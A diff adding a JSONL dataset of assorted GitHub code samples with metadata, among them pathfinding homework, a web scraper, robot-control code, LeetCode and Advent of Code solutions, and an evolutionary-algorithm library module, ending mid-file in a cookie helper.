diff --git "a/5579.jsonl" "b/5579.jsonl" new file mode 100644--- /dev/null +++ "b/5579.jsonl" @@ -0,0 +1,857 @@ +{"seq_id":"12551812550","text":"# [3] Алгоритмы поиска пути и структурное программирование\nimport numpy as np\nfrom queue import PriorityQueue\n\n#так как у меня др 9 августа, будем использовать метод поиска в глубину\ndef maze_to_array(file_name):\n with open(file_name, 'r') as f:\n maze = [i.rstrip() for i in f]\n for i in range(len(maze)):\n maze[i]=list(maze[i])\n return maze\n\ndef maze_to_file(path, file_name):\n with open(file_name, 'w') as f: \n for i in maze_resh:\n for j in i:\n f.write(f\"{j}\")\n f.write(f\"\\n\")\n\ndef data(maze):\n print(f\"границы по столбцу [0,{len(maze[0])}], по строке [0,{len(maze[:])}]\")\n x_a = int(input(\"координаты аватара по столбцу: \")) -1\n y_a = int(input(\"координаты аватара по строке: \")) -1\n x_k = int(input(\"координаты ключа по столбцу: \")) -1\n y_k = int(input(\"координаты ключа по строке: \")) -1\n maze[y_a][x_a] = 'A' #взял наоборот, тк в блокноте неправильная СО\n maze[y_k][x_k] = '*'\n start = (y_a, x_a)\n key = (y_k, x_k)\n return start, key\n\ndef make_step(maze, lv, v, q): \n coord = [ ( 0 , -1 ),( 1 , 0 ),( 0 , 1 ),( -1 , 0 ) ] \n for x_step, y_step in coord:\n x, y = lv[0] + x_step, lv[1] + y_step \n if 0 < x < len(maze) and 0 < y < len(maze[0]): \n if v.get((x, y)) == None and maze[x][y] != '#': \n v[(x, y)] = (lv) \n q.append((x, y))\n return q , v\n\ndef maze_way(maze, path, sign):\n way = np.copy(maze) \n for i in path:\n if way[i[0],i[1]] != '*' and way[i[0],i[1]] != 'A':\n way[i[0],i[1]] = sign\n return way\n\ndef ro(end, c):\n return abs(end[0] - c[0]) + abs(end[1] - c[1])\n\n# метод поиска в глубину\ndef search_vglubinu(maze, start, end):\n v = {} \n v[start] = start\n q = [] \n q.append(start)\n while len(q) != 0: \n lv = q.pop() \n step = make_step(maze, lv, v, q)\n q = step[0]\n v = step[1]\n path = reverse_path(v, start, end)\n return path\n\ndef reverse_path(v, start, end): \n c, path = end, []\n while c != start:\n path.append(c)\n c = v[c]\n path.append(start)\n path.reverse()\n return path\n\ndef get_neighbors(maze, pos):\n row, col = pos\n neighbors = [(row-1, col), (row+1, col), (row, col-1), (row, col+1)]\n return [neighbor for neighbor in neighbors if 0 <= neighbor[0] < len(maze) and 0 <= neighbor[1] < len(maze[0])]\n\n#метод поиска A*\ndef search_a(maze, start, end, max_cost):\n pq = PriorityQueue()\n pq.put(start, 0)\n c = {}\n cost = {}\n c[start] = None\n cost[start] = 0\n while not pq.empty():\n i = pq.get()\n if i == end:\n break\n for n in get_neighbors(maze, i):\n new_cost = cost[i] + 1\n if 0 <= n[0] < len(maze) and 0 <= n[1] < len(maze[0]) and maze[n[0]][n[1]] != '#' and (n not in cost or new_cost < cost[n]) and new_cost <= max_cost:\n cost[n] = new_cost\n p = new_cost + ro(end, n)\n pq.put(n, p)\n c[n] = i\n path = reverse_path(c, start, end)\n return path\n\nmaze = maze_to_array(\"maze-for-u.txt\")\nstart, key = data(maze)\nend_1 = (1,1)\nend_2 = (len(maze[:])-2, len(maze[0])-2)\nif ro(key, end_1) < ro(key, end_2):\n end = end_1\n print(\"\\nближний выход - верхний\")\nelse:\n end = end_2\n print(\"\\nближний выход - нижний\")\n\npath_to_key = search_vglubinu(maze, start, key)\npath_to_end = search_a(maze, key, end, 100000)\n\nprint(\"длина от аватара до ключа =\", len(path_to_key)-1, \"методом поиска в глубину\")\nprint(\"длина от ключа до выхода =\", len(path_to_end)-1, \"методом A*\")\nprint(\"длина от аватара до выхода =\", len(path_to_key)+len(path_to_end)-1)\n\nmaze_resh = maze_way(maze, path_to_key , '.')\nmaze_resh = maze_way(maze_resh, path_to_end , ',')\nmaze_to_file(maze_resh, \"maze-for-me-done.txt\")\nprint(\"файл создан под названием 'maze-for-me-done.txt'\")\nprint(\"'A'-аватар,'*'-ключ,'.'-путь от 'A' до '*',','-путь от '*' до выхода\")\n'''\nграницы по столбцу [0,800], по строке [0,600]\nкоординаты аватара по столбцу: 790\nкоординаты аватара по строке: 10\nкоординаты ключа по столбцу: 10\nкоординаты ключа по строке: 590\n\nближний выход - верхний\nдлина от аватара до ключа = 1442 ��етодом поиска в глубину\nдлина от ключа до выхода = 2174 методом A*\nдлина от аватара до выхода = 3617\nфайл создан под названием 'maze-for-me-done.txt'\n'A'-аватар,'*'-ключ,'.'-путь от 'A' до '*',','-путь от '*' до выхода\n'''\n","repo_name":"kit8nino/2023-MP","sub_path":"429/svyatov_kirill/[3].py","file_name":"[3].py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29439099929","text":"import scrapy\nfrom uncommonGoodsScraping.items import UncommongoodsscrapingItem\nfrom uncommonGoodsScraping.items import ImgData\nfrom scrapy.http import Request\n\n\n\n# To read from a csv file\nimport csv\nclass UncommongoodsSpider(scrapy.Spider):\n name = 'uncommonGoods'\n allowed_domains = ['uncommongoods.com']\n start_urls = ['http://uncommongoods.com/']\n# This function helps us to scrape the whole content of the website\n # by following the starting URLs in a csv file.\n def start_requests(self):\n # Read main category URLs from a csv file\n with open (\"/Users/AB/Pictures/Uncommon-Goods/uncommonGoodsScraping/csvFiles/SpiderMainCategoryLinksUC.csv\", \"rU\") as f:\n reader=csv.DictReader(f)\n for row in reader:\n url=row['url']\n link_urls = [url.format(i) for i in range(1,6)]\n for link_url in link_urls:\n print(link_url)\n\n request=Request(link_url, callback=self.parse_product_pages,meta={'interests': row['interests']})\n yield request\n# This function scrapes the page with the help of xpath provided\n def parse_product_pages(self,response):\n item = UncommongoodsscrapingItem()\n \n # Get the HTML block where all the products are listed\n #
HTML element with the \"product-list-item\" class name\n content=response.xpath('//*[@id=\"frame\"]/app-ug-spa/div/div/app-family-page/main/div[2]/div/ul')\n # loop through the each
element in the content\n for product_content in content:\n image_urls = []\n # get the product details and populate the items\n item['productId']=product_content.xpath('.//article/@id').extract_first()\n item['productName']=product_content.xpath('//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"product__name\", \" \" ))]').extract_first()\n item['price']=product_content.xpath('//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"ng-lazyloaded\", \" \" ))]/img/@src').extract_first()\n item['imageUrl']=product_content.xpath('//*[contains(concat( \" \", @class, \" \" ), concat( \" \", \"price\", \" \" ))]').extract_first()\n item['productLink']=\"https://www.uncommongoods.com/\"+product_content.xpath('.//a/@href').extract_first()\n image_urls.append(item['imageUrl'])\n item['company']=\"UNCOMMON\"\n item['interests']=response.meta['interests']\n \n if item['productId']==None:\n break\n yield (item)\n # download the image contained in image_urls\n yield ImgData(image_urls=image_urls)\n ","repo_name":"abdimohamud/Uncommon-Goods","sub_path":"uncommonGoodsScraping/uncommonGoodsScraping/spiders/uncommonGoods.py","file_name":"uncommonGoods.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4919002176","text":"\"\"\"Hussain Mumtaz\n Anissa Sexton\n husmum@gatech.edu\n\n We worked on this homework assignment alone,\n using only this semester's course materials\"\"\"\n\n\nfrom Myro import *\nfrom Graphics import *\n\ninit()\n\ndef sensorValue():\n a = getLight(\"left\")\n b = getLight(\"right\")\n c = getObstacle(\"right\")\n v = a/(b+c)\n value = round(v,3)\n return (value)\n\nwin= Window(\"A\",250,250)\nwin.mode = \"manual\"\n\ndef move(win,event):\n log = open(\"myMovements.txt\",\"w\") #Creates the file\n log.close\n log = open(\"myMovements.txt\", \"a\")\n \"\"\"Each additional movement must be appended,\n otherwise the file will be overwritten each time\"\"\"\n\n if event.key == \"Up\":\n forward (1,.1)\n s = sensorValue()\n a = \" \".join ((\"forward .1\", str(s), \"\\n\"))\n log.write (a)\n\n if event.key == \"Down\":\n backward(1,.1)\n s = sensorValue()\n a = \" \".join ((\"backward .1\", str(s), \"\\n\"))\n log.write (a)\n\n if event.key == \"Left\":\n turnLeft(1,.1)\n s = sensorValue()\n a = \" \".join ((\"turnLeft .1\", str(s), \"\\n\"))\n log.write (a)\n\n if event.key == \"Right\":\n turnRight(1,.1)\n s = sensorValue()\n a = \" \".join ((\"turnRight .1\", str(s), \"\\n\"))\n log.write (a)\n\n if event.key == \"b\":\n beep (1,800)\n s = sensorValue()\n a = \" \".join ((\"beep 1\", str(s), \"\\n\"))\n log.write (a)\n\n if event.key == \"B\":\n beep (1,800)\n s = sensorValue()\n a = \" \".join ((\"beep 1\", str(s), \"\\n\"))\n log.write (a)\n\n log.close()\n\ndef collectData (myFile, direction):\n toRead = open(myFile,\"r\")\n time = 0\n beep = 0\n timesDirection = 0\n while True:\n line = toRead.readline()\n\n words = line.split()\n if len(line) != 0:\n margTime = int(words[1])\n time += margTime\n\n if \"beep\" in line:\n beep += 1\n\n if direction in line:\n timesDirection += 1\n if len(line) == 0:\n break\n\n print (\"The robot traveled for\", time,\n \"seconds total, beeping\", beep, \"times. This\"\n \" robot moved\", direction, \"a total of\",\n timesDirection, \"times.\")\n\n\ndef replay (myFile):\n toRead = open(myFile,\"r\")\n while True:\n line = toRead.readline()\n\n words = line.split()\n if len(line) != 0:\n direction = words[0]\n time = int (words[1])\n if direction != \"beep\":\n eval(direction) (1,time)\n elif direction == \"beep\":\n eval(direction) (time,800)\n if len(line) == 0:\n break\n\nonKeyPress(move)\n","repo_name":"hmumtaz/gatech","sub_path":"CS1301/HW05/hw05.py","file_name":"hw05.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44069743771","text":"#\n# @lc app=leetcode id=703 lang=python3\n#\n# [703] Kth Largest Element in a Stream\n#\n\n# @lc code=start\nimport bisect\nimport heapq\nfrom typing import List\n\n\nclass KthLargest:\n\n def __init__(self, k: int, nums: List[int]):\n self.k = k\n self.nums = nums\n heapq.heapify(self.nums)\n while k < len(self.nums):\n heapq.heappop(self.nums)\n \n\n def add(self, val: int) -> int:\n heapq.heappush(self.nums, val)\n if self.k < len(self.nums):\n heapq.heappop(self.nums)\n return self.nums[0]\n\n\n# Your KthLargest object will be instantiated and called as such:\n# obj = KthLargest(k, nums)\n# param_1 = obj.add(val)\n# @lc code=end\n","repo_name":"yoshikipom/leetcode","sub_path":"solve/703.kth-largest-element-in-a-stream.py","file_name":"703.kth-largest-element-in-a-stream.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31568100422","text":"from cn.edustar.jitar.util import ParamUtil\r\nfrom evaluation_query import *\r\nfrom base_action import *\r\n\r\nclass evaluation_stats(ActionResult, SubjectMixiner, EvaluationBase):\r\n def __init__(self):\r\n self.params = ParamUtil(request)\r\n \r\n def execute(self):\r\n if self.canManage() == False:\r\n self.addActionError(u\"需要系统内容管理员进行管理。\")\r\n return self.ERROR\r\n \r\n cmd = self.params.safeGetStringParam(\"cmd\")\r\n if cmd == \"\":cmd = \"list\"\r\n if cmd == \"list\":\r\n self.list()\r\n \r\n return \"/WEB-INF/ftl/evaluation/evaluation_stats.ftl\"\r\n \r\n def list(self):\r\n qry = EvaluationPlanQuery(\"ev.evaluationPlanId, ev.evaluationYear, ev.evaluationSemester, ev.evaluationTimes, ev.metaSubjectId, ev.metaGradeId, ev.startDate, ev.endDate, ev.userCount, ev.enabled, ev.attendUserCount, ev.evaluationCount\")\r\n pager = self.params.createPager()\r\n pager.itemName = u\"评课活动\"\r\n pager.itemUnit = u\"个\"\r\n pager.totalRows = qry.count()\r\n pager.pageSize = 20\r\n evaluation_list = qry.query_map(pager)\r\n request.setAttribute(\"pager\", pager)\r\n request.setAttribute(\"evaluation_list\", evaluation_list)\r\n self.putSubjectList()\r\n self.putGradeList()\r\n","repo_name":"yxxcrtd/jitar2.0","sub_path":"WebContent/manage/evaluation/evaluation_stats.py","file_name":"evaluation_stats.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70317219642","text":"\"\"\"Run full process tests on dismantle.\"\"\"\nfrom pathlib import Path\n\nfrom dismantle.extension import Extensions\nfrom dismantle.index import JsonFileIndexHandler\nfrom dismantle.package import LocalPackageHandler\n\n\ndef test_full(datadir: Path) -> None:\n from tests.ColorExtension import ColorExtension\n from tests.GreetingExtension import GreetingExtension\n ext_types = [ColorExtension, GreetingExtension]\n index_src = datadir / 'index.json'\n index = JsonFileIndexHandler(str(index_src))\n packages = {}\n for pkg_meta in index:\n meta = index[pkg_meta]\n path = datadir / meta['path']\n package = LocalPackageHandler(meta['name'], path)\n package._meta = {**package._meta, **meta}\n package.install()\n packages[package.name] = package\n extensions = Extensions(ext_types, packages, 'd_')\n assert extensions.types == ['color', 'greeting']\n assert list(extensions.category('color').keys()) == [\n '@scope-one/package-one.extension.green.GreenColorExtension',\n '@scope-one/package-two.extension.red.RedColorExtension',\n '@scope-one/package-three.extension.blue.BlueColorExtension',\n ]\n assert list(extensions.extensions.keys()) == ['color', 'greeting']\n assert list(extensions.imports.keys()).sort() == [\n '@scope-one/package-one.extension.hello',\n '@scope-one/package-one.extension.green',\n '@scope-one/package-two.extension.afternoon',\n '@scope-one/package-two.extension.red',\n '@scope-one/package-three.extension.goodbye',\n '@scope-one/package-three.extension.blue'\n ].sort()\n","repo_name":"area28technologies/dismantle","sub_path":"tests/dismantle_test.py","file_name":"dismantle_test.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"18717709494","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 4 07:43:22 2021\n\n@author: Odatas\n\"\"\"\n\nimport numpy\n\n#Checks a matrix for bingo\ndef testForBingo(matrix):\n a = numpy.sum(matrix,axis=0) \n b = numpy.sum(matrix,axis=1) \n for i in a:\n if i > 4:\n return True\n for i in b:\n if i > 4:\n return True\n return False\n\n#calculate the sum of the filds of the matrix which are 0 on the shadow\ndef calculateSum(matrix,shadow):\n matrixsum=0\n for i in range(5):\n for j in range(5):\n if shadow[i][j]==0:\n matrixsum += matrix[i][j]\n \n return matrixsum\n\n#get the bingo number draw\nwith open('day4.txt') as f:\n first_line = f.readline()\n draws = [int(s) for s in first_line.split(\",\")]\n\n#get the bingo cards\ndata = numpy.loadtxt('day4.txt',skiprows=2)\nbingoCards = numpy.array_split(data,len(data)/5)\n#Creat the shadow for marking nubmers on bingocard\nshadow = []\nfor i in range(int(len(data)/5)):\n shadow.append(numpy.zeros((5,5)))\n\n#Tupel List for Cardnumber and which number made the Card win bingo\ntupelList=[]\n#Go throu all draws\nfor bingoDraw in draws:\n #check every card\n for cardNumber in range(len(bingoCards)):\n #if the drawn number is in the bingo card check it\n if bingoDraw in bingoCards[cardNumber] :\n #if the bingocard allready won, skip it\n if len([item for item in tupelList if item[0] == cardNumber]) > 0:\n continue\n #look up the field where the number is\n tupel=numpy.where(bingoDraw == bingoCards[cardNumber])\n #mark the field in the shadowcard\n shadow[cardNumber][tupel[0][0]][tupel[1][0]] = 1\n #check if the card has now a Bingo\n if testForBingo(shadow[cardNumber]):\n #when bingo save card and number which made card win\n if len([item for item in tupelList if item[0] == cardNumber]) == 0:\n tupelList.append((cardNumber,bingoDraw))\nfirst = (0,0)\nlast = (0,0)\n#go through all draws again and save the first occuring winner and the last one\nfor bingoDraw in draws:\n for tupel in tupelList:\n if bingoDraw == tupel[1]:\n last = tupel\n if first == (0,0):\n first = tupel\n \nprint(\"Part 1:\", first[1] * calculateSum(bingoCards[first[0]],shadow[first[0]]))\nprint(\"Part 2:\", last[1] * calculateSum(bingoCards[last[0]],shadow[last[0]]))\n\n\n\n","repo_name":"Odatas/Advent-of-Code","sub_path":"2021/Day 04/day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16247512243","text":"# To handle passing the data in from the json files\n\n\nimport json\n\n\ndef get_data_type(name_string, attribute_name):\n print(\"Attempting to load data- \" + name_string + \".json\")\n try:\n with open('yelp_data/yelp_academic_dataset_' + name_string + '.json', 'r', encoding='ascii', errors='ignore') as f:\n data = [json.loads(line)[attribute_name] for line in f]\n return data\n except json.JSONDecodeError as e:\n print(e)\n\ndef get_business_id(business_name):\n print(\"Getting Business ID\")\n ids = get_data_type(\"business\", \"business_id\")\n names = get_data_type(\"business\", \"name\")\n for i in range(0, len(names)):\n if names[i] == business_name:\n\n return ids[i]\n return -1\n\ndef get_stars_for_business(business_id):\n print('Getting stars and dates for business')\n result_stars = []\n result_dates = []\n corresponding_business = get_data_type('review', 'business_id')\n all_stars = get_data_type('review', 'stars')\n all_dates = get_data_type('review', 'date')\n\n for i in range(0, len(corresponding_business)):\n if corresponding_business[i] == business_id:\n result_stars.append(all_stars[i])\n result_dates.append(all_dates[i])\n print(len(result_stars))\n print(len(result_dates))\n return result_stars, result_dates\n\n","repo_name":"nverlin/yelp_challenge","sub_path":"data_handler.py","file_name":"data_handler.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70654171001","text":"import os\n\nfrom gi.repository import Gtk\n\nfrom _entropy.rigo.paths import DATA_DIR\n\nfrom entropy.i18n import _\n\n\nclass WelcomeBox(Gtk.VBox):\n\n def __init__(self):\n Gtk.VBox.__init__(self)\n self._image_path = os.path.join(DATA_DIR, \"ui/gtk3/art/rigo.png\")\n\n def render(self):\n image = Gtk.Image.new_from_file(self._image_path)\n label = Gtk.Label()\n label.set_markup(_(\"Browse Applications with ease\"))\n self.pack_start(image, False, False, 0)\n self.pack_start(label, False, False, 0)\n label.show()\n image.show()\n","repo_name":"Sabayon/entropy","sub_path":"rigo/rigo/ui/gtk3/widgets/welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"40"} +{"seq_id":"71045742201","text":"\"\"\"\nA fully configurable, general (mu+lambda) Evolutionary Algorithm.\n\nThis evolutionary algorithm begins by sampling\n:attr:`~moptipy.algorithms.so.ea.EA.mu`\nsolutions using the nullary search operation\n:attr:`~moptipy.api.algorithm.Algorithm0.op0`. In each iteration, it then uses\n:attr:`~moptipy.algorithms.so.ea.EA.mu` existing solutions as input for\nthe search operations, where, for each solution to be sampled, the binary\noperation :attr:`~moptipy.api.algorithm.Algorithm2.op2` is used with\nprobability :attr:`~moptipy.algorithms.so.ea.EA.br` and (otherwise), the unary\noperator :attr:`~moptipy.api.algorithm.Algorithm1` is used. The inputs of both\noperators are chosen from the :attr:`~moptipy.algorithms.so.ea.EA.mu`\nsolutions using :attr:`~moptipy.algorithms.so.general_ea.GeneralEA.mating`\nselection. After :attr:`~moptipy.algorithms.so.ea.EA.lambda_` new solutions\nhave been created this way (and have been evaluated as well), a fitness\nassignment process (:class:`~moptipy.algorithms.so.fitness.Fitness`) assigns\nfitness values to them based on their objective values\n(:attr:`~moptipy.algorithms.so.record.Record.f`), maybe also using the index\nof the iteration (:attr:`~moptipy.algorithms.so.record.Record.it`) in which\nthey were created. The survival selection\n:attr:`~moptipy.algorithms.so.general_ea.GeneralEA.survival` then chooses,\nfrom the joint set of `mu+lambda` solutions, the `mu` solutions for the\nnext iteration. Both mating and survival selection are instances of class\n:class:`~moptipy.algorithms.modules.selection.Selection`.\n\nThis algorithm is equivalent to :class:`~moptipy.algorithms.so.ea.EA`, but\nallows for using a customized fitness assignment step\n(:class:`~moptipy.algorithms.so.fitness.Fitness`) as well as customizable\nsurvival and :attr:`~moptipy.algorithms.so.general_ea.GeneralEA.mating`\nselection (:class:`~moptipy.algorithms.modules.selection.Selection`).\n\n1. Thomas Bäck, David B. Fogel, and Zbigniew Michalewicz, eds., *Handbook of\n Evolutionary Computation.* 1997. Computational Intelligence Library.\n New York, NY, USA: Oxford University Press, Inc. ISBN: 0-7503-0392-1\n2. James C. Spall. *Introduction to Stochastic Search and Optimization.*\n Estimation, Simulation, and Control - Wiley-Interscience Series in Discrete\n Mathematics and Optimization, volume 6. 2003. Chichester, West Sussex, UK:\n Wiley Interscience. ISBN: 0-471-33052-3. http://www.jhuapl.edu/ISSO/.\n3. Frank Hoffmeister and Thomas Bäck. Genetic Algorithms and Evolution\n Strategies: Similarities and Differences. In Hans-Paul Schwefel and\n Reinhard Männer, *Proceedings of the International Conference on Parallel\n Problem Solving from Nature (PPSN I),* October 1-3, 1990, Dortmund,\n Germany, volume 496 of Lecture Notes in Computer Science, pages 455-469,\n Berlin/Heidelberg, Germany: Springer. ISBN: 978-3-540-54148-6.\n https://doi.org/10.1007/BFb0029787.\n\"\"\"\nfrom typing import Callable, Final, cast\n\nfrom numpy.random import Generator\n\nfrom moptipy.algorithms.modules.selection import (\n FitnessRecord,\n Selection,\n check_selection,\n)\nfrom moptipy.algorithms.modules.selections.best import Best\nfrom moptipy.algorithms.modules.selections.random_without_repl import (\n RandomWithoutReplacement,\n)\nfrom moptipy.algorithms.so.ea import EA, _float_0\nfrom moptipy.algorithms.so.fitness import Fitness, FRecord, check_fitness\nfrom moptipy.algorithms.so.fitnesses.rank_and_iteration import RankAndIteration\nfrom moptipy.api.operators import Op0, Op1, Op2\nfrom moptipy.api.process import Process\nfrom moptipy.utils.logger import KeyValueLogSection\nfrom moptipy.utils.strings import PART_SEPARATOR\n\n\nclass _Record(FRecord):\n \"\"\"Same as `FRecord`, but with a secret selection marker.\"\"\"\n\n def __init__(self, x, f: int | float, selected: bool = False):\n \"\"\"\n Create the record.\n\n :param x: the data structure for a point in the search space\n :param f: the corresponding objective value\n :param selected: is the record currently in use?\n \"\"\"\n super().__init__(x, f)\n #: an internal flag - do NOT access!!\n self._selected: bool = selected\n\n\n# start book\nclass GeneralEA(EA):\n \"\"\"The fully customizable (mu+lambda) EA.\"\"\"\n\n def solve(self, process: Process) -> None:\n \"\"\"\n Apply the (mu+lambda) EA to an optimization problem.\n\n :param process: the black-box process object\n \"\"\"\n # initialization of some variables omitted in book for brevity\n# end book\n mu: Final[int] = self.mu # mu: number of best solutions kept\n lambda_: Final[int] = self.lambda_ # number of new solutions/gen\n mu_plus_lambda: Final[int] = mu + lambda_ # size = mu + lambda\n random: Final[Generator] = process.get_random() # random gen\n create: Final[Callable] = process.create # create x container\n evaluate: Final[Callable] = process.evaluate # the objective\n op0: Final[Callable] = self.op0.op0 # the nullary operator\n op1: Final[Callable] = self.op1.op1 # the unary operator\n op2: Final[Callable] = self.op2.op2 # the binary operator\n br: Final[float] = self.br # the rate at which to use op2\n should_terminate: Final[Callable] = process.should_terminate\n r01: Final[Callable[[], float]] = cast( # only if 0 quit # -book\n f = evaluate(x) # continue? ok, evaluate new solution\n recs[i] = _Record(x, f, selected) # create and store record\n\n mating_pool: Final[list] = recs[0:mu] # the selection survivors\n assign_fitness(mating_pool, random) # assign fitness first time\n# end book\n mating_pool_clear: Final[Callable[[], None]] = mating_pool.clear\n mating_pool_append: Final[Callable[[FitnessRecord], None]] = \\\n cast(Callable[[FitnessRecord], None], mating_pool.append)\n# start book\n it: int = 0 # set the iteration counter\n while True: # lst: keep 0..mu-1, overwrite mu..mu+lambda-1\n it = it + 1 # step the iteration counter\n population_clear() # clear population\n\n di = 0 # set index of next potential destination\n for _ in range(lambda_): # for all lambda offspring\n if should_terminate(): # only continue if we still... # -book\n if process.has_log(): # -book\n self.fitness.log_information_after_run( # -book\n process) # -book\n return # ...have sufficient budget # -book\n while True: # get the next non-selected record\n dest = recs[di] # get the record\n di = di + 1 # step counter\n if dest._selected: # if it was selected\n dest._selected = False # mark it as unselected\n population_append(dest) # store in population\n continue # try next record\n break # use the (unselected) record as destination\n\n x = dest.x # the destination \"x\" value\n dest.it = it # remember iteration of solution creation\n do_binary: bool = r01() < br # will we do binary operation?\n parents_clear() # clear mating pool: room for 2\n mating_selection(mating_pool, parents_append,\n 2 if do_binary else 1, random)\n\n if do_binary: # binary operation (with p == br)\n op2(random, x, parents[0].x, parents[1].x)\n else: # unary operation otherwise\n op1(random, x, parents[0].x) # apply unary op\n dest.f = evaluate(x) # evaluate new point\n population_append(dest) # store in population\n\n # add remaining selected solutions from recs to population\n # from index di to mu+lambda ... omitted for brevity in book\n # end book\n for di2 in range(di, mu_plus_lambda):\n other = recs[di2]\n if other._selected: # only if solution was selected\n other._selected = False # set as unselected\n population_append(other) # put into population\n # start book\n assign_fitness(population, random) # assign fitness\n mating_pool_clear() # clear list of survived records\n survival_selection(population, mating_pool_append, mu, random)\n for rec in mating_pool: # mark all selected solutions as\n rec._selected = True # selected\n# end book\n\n def __init__(self, op0: Op0,\n op1: Op1 | None = None,\n op2: Op2 | None = None,\n mu: int = 1, lambda_: int = 1,\n br: float | None = None,\n fitness: Fitness | None = None,\n survival: Selection | None = None,\n mating: Selection | None = None,\n name: str = \"generalEa\") -> None:\n \"\"\"\n Create the customizable Evolutionary Algorithm (EA).\n\n :param op0: the nullary search operator\n :param op1: the unary search operator\n :param op2: the binary search operator\n :param mu: the number of best solutions to survive in each generation\n :param lambda_: the number of offspring in each generation\n :param br: the rate at which the binary operator is applied\n :param fitness: the fitness assignment process\n :param survival: the survival selections algorithm\n :param mating: the mating selections algorithm\n :param name: the base name of the algorithm\n \"\"\"\n if fitness is None:\n fitness = RankAndIteration()\n if fitness.__class__ is not RankAndIteration:\n name = f\"{name}{PART_SEPARATOR}{fitness}\"\n if survival is None:\n survival = Best()\n if mating is None:\n mating = RandomWithoutReplacement()\n if (survival.__class__ is not Best) \\\n or (mating.__class__ is not RandomWithoutReplacement):\n name = f\"{name}{PART_SEPARATOR}{survival}{PART_SEPARATOR}{mating}\"\n\n super().__init__(op0, op1, op2, mu, lambda_, br, name)\n #: the fitness assignment process\n self.fitness: Final[Fitness] = check_fitness(fitness)\n #: the survival selection algorithm\n self.survival: Final[Selection] = check_selection(survival)\n #: the mating selection algorithm\n self.mating: Final[Selection] = check_selection(mating)\n\n def log_parameters_to(self, logger: KeyValueLogSection) -> None:\n \"\"\"\n Log the parameters of the algorithm to a logger.\n\n :param logger: the logger for the parameters\n \"\"\"\n super().log_parameters_to(logger)\n with logger.scope(\"fitness\") as v:\n self.fitness.log_parameters_to(v)\n with logger.scope(\"survival\") as s:\n self.survival.log_parameters_to(s)\n with logger.scope(\"mating\") as m:\n self.mating.log_parameters_to(m)\n\n def initialize(self) -> None:\n \"\"\"Initialize the algorithm.\"\"\"\n super().initialize()\n self.survival.initialize()\n self.mating.initialize()\n self.fitness.initialize()\n","repo_name":"thomasWeise/moptipy","sub_path":"moptipy/algorithms/so/general_ea.py","file_name":"general_ea.py","file_ext":"py","file_size_in_byte":13399,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"22436333370","text":"from life import Player, Team\n\nteam = Team()\n\nfor player in range(9):\n name = input(\"Batter's Name:\\n>\")\n practice = int(input(\"How much time dedicated to practice on a scale from 0-100:\\n>\"))\n downtime = 100 - practice\n\n player = Player(name, practice, downtime)\n player.performance()\n\n team.add_batters(player)\n\nprint(\"Batters:\")\nfor player in team.bat_team:\n print(player + \"\\n\")\n\nfor player in range(3):\n name = input(\"Pitcher's Name:\\n>\")\n practice = int(input(\"How much time dedicated to practice on a scale from 0-100:\\n>\"))\n downtime = 100 - practice\n\n player = Player(name, practice, downtime)\n player.performance()\n\n team.add_pitchers(player)\n\nprint(\"Pitchers:\")\nfor player in team.pitchers:\n print(player)\n\nteam.at_bat()\n","repo_name":"rallen0150/modeling_life","sub_path":"life_sim.py","file_name":"life_sim.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11730590586","text":"def solution(people, limit):\n answer = 0\n people.sort(reverse=True)\n curr_min = (people[-1], len(people)-1) # 가장 적은 몸무게와 인덱스를 저장\n \n for i, weight in enumerate(people):\n rest = limit - weight\n # 현재 사람 1을 태운 보트에 나머지 사람이 가장 적은 몸무게를 태울 수 있다면\n # 사람 1보다 더 적은 몸무게의 사람도 마찬가지로 가장 적은 몸무게의 사람과 탈 수 있으므로\n # 현재 상황이 가장 꽉 차게 태울 수 있다. \n if rest >= curr_min[0]:\n if i <= curr_min[1]:\n answer += 1\n next_min_idx = curr_min[1] - 1\n curr_min = (people[next_min_idx], next_min_idx)\n else: # 더 이상 뒤에 태울 사람이 없으므로 종료\n return answer\n \n else:\n answer += 1\n \n return answer\n ","repo_name":"hayoung-99/algorithm","sub_path":"프로그래머스/lv2/42885. 구명보트/구명보트.py","file_name":"구명보트.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33564500068","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os, sys\nimport cookielib\nfrom cookielib import Cookie\nimport urllib, urllib2\nfrom bs4 import BeautifulSoup\nimport re\nimport json\nimport string\nfrom datetime import date\nimport time\n\ndef dec_json(chemin):\n with open(chemin, 'r') as fichier:\n return json.loads(fichier.read())\n\ndef enc_json(database, chemin):\n with open(chemin, 'w') as fichier:\n json.dump(database, fichier)\n\ndef makeCookie(name, value):\n return Cookie(\n version=0,\n name=name,\n value=value,\n port=None,\n port_specified=False,\n domain=\"\",\n domain_specified=False,\n domain_initial_dot=False,\n path=\"/\",\n 